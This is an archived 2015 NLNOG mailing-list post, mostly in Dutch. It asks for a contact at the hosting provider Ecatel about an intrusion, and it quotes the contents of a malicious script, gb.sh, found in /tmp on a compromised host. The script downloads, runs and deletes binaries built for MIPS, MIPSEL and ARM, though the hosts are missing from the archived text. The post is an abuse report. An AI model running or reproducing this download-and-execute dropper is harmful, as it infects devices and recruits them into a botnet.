[Nlnog] Ecatel op de lijst?

Sabri Berisha sabri at cluecentral.net
Tue Sep 15 04:45:40 UTC 2015


Hebben we iemand van Ecatel (AS29073) op de lijst? We hebben een hakkertje op het net. Mijn huidige broodheer meldde het volgende: 

A script is installed (not sure how) in /tmp on the host, called gb.sh. Contents as follows: 

# cat gb.sh 


cd /tmp; wget -q; chmod 777 pxmips; ./pxmips; rm -f pxmips; killall -9 mips 

cd /tmp; wget -q; chmod 777 pxmipsel; ./pxmipsel; rm -f pxmipsel; killall -9 mipsel 

cd /tmp; wget -q; chmod 777 pxarm; ./pxarm; rm -f pxarm; killall -9 armv5l appears to be based in the Netherlands somewhere, and is on many internet blacklists. Any idea what that is? The host is successfully able to retrieve the px* apps, but they do not run properly. 


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.nlnog.net/pipermail/nlnog/attachments/20150914/7bdede65/attachment.html>

More information about the NLNOG mailing list